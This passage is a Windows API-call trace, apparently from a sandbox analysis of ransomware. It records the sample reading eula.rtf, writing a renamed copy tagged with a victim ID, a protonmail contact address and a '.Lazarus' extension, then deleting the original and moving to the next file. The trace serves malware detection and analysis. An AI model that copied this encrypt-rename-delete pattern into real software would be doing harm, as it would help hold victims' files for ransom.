(HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0071.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.394] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.394] GetFileType (hFile=0x410) returned 0x1 [0071.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0071.395] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.395] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.395] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.395] CloseHandle (hObject=0x410) returned 1 [0071.395] AreFileApisANSI () returned 1 [0071.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0071.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.395] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.395] GetFileType (hFile=0x410) returned 0x1 [0071.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.395] CloseHandle (hObject=0x410) returned 1 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.396] AreFileApisANSI () returned 1 [0071.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0071.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.397] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13)) returned 1 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0071.397] AreFileApisANSI () returned 1 [0071.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.397] GetLastError () returned 0x0 [0071.397] SetLastError (dwErrCode=0x0) [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0071.397] GetLastError () returned 0x0 [0071.397] SetLastError (dwErrCode=0x0) [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68b80 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0071.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0071.398] AreFileApisANSI () returned 1 [0071.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0071.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0071.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0071.398] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.405] GetFileType (hFile=0x410) returned 0x1 [0071.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.406] AreFileApisANSI () returned 1 [0071.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0071.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.406] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.406] GetFileType (hFile=0x418) returned 0x1 [0071.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.406] GetLastError () returned 0x0 [0071.406] SetLastError (dwErrCode=0x0) [0071.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.406] GetLastError () returned 0x0 [0071.406] SetLastError (dwErrCode=0x0) [0071.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0071.406] ReadFile (in: hFile=0x418, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0xf13, lpOverlapped=0x0) returned 1 [0071.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0071.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0071.414] GetLastError () returned 0x0 [0071.414] SetLastError (dwErrCode=0x0) [0071.414] GetLastError () returned 0x0 [0071.414] SetLastError (dwErrCode=0x0) [0071.414] GetLastError () returned 0x0 [0071.414] SetLastError (dwErrCode=0x0) [0071.414] ReadFile (in: hFile=0x418, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.415] GetLastError () returned 0x0 [0071.506] SetLastError (dwErrCode=0x0) [0071.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3) returned 0x7d0a0 [0071.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0071.506] GetLastError () returned 0x0 [0071.506] SetLastError (dwErrCode=0x0) [0071.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0071.506] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xf20, lpOverlapped=0x0) returned 1 [0071.507] GetLastError () returned 0x0 [0071.507] SetLastError (dwErrCode=0x0) [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.508] GetLastError () returned 0x0 [0071.508] SetLastError (dwErrCode=0x0) [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0071.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0071.508] CloseHandle (hObject=0x410) returned 1 [0071.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.509] CloseHandle (hObject=0x418) returned 1 [0071.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.510] AreFileApisANSI () returned 1 [0071.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0071.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.510] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.510] GetFileType (hFile=0x418) returned 0x1 [0071.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0071.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0071.511] GetLastError () returned 0xb7 [0071.511] SetLastError (dwErrCode=0xb7) [0071.511] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.512] CloseHandle (hObject=0x418) returned 1 [0071.512] AreFileApisANSI () returned 1 [0071.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0071.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0071.512] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.515] AreFileApisANSI () returned 1 [0071.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0071.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.515] AreFileApisANSI () returned 1 [0071.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0071.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0071.515] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, 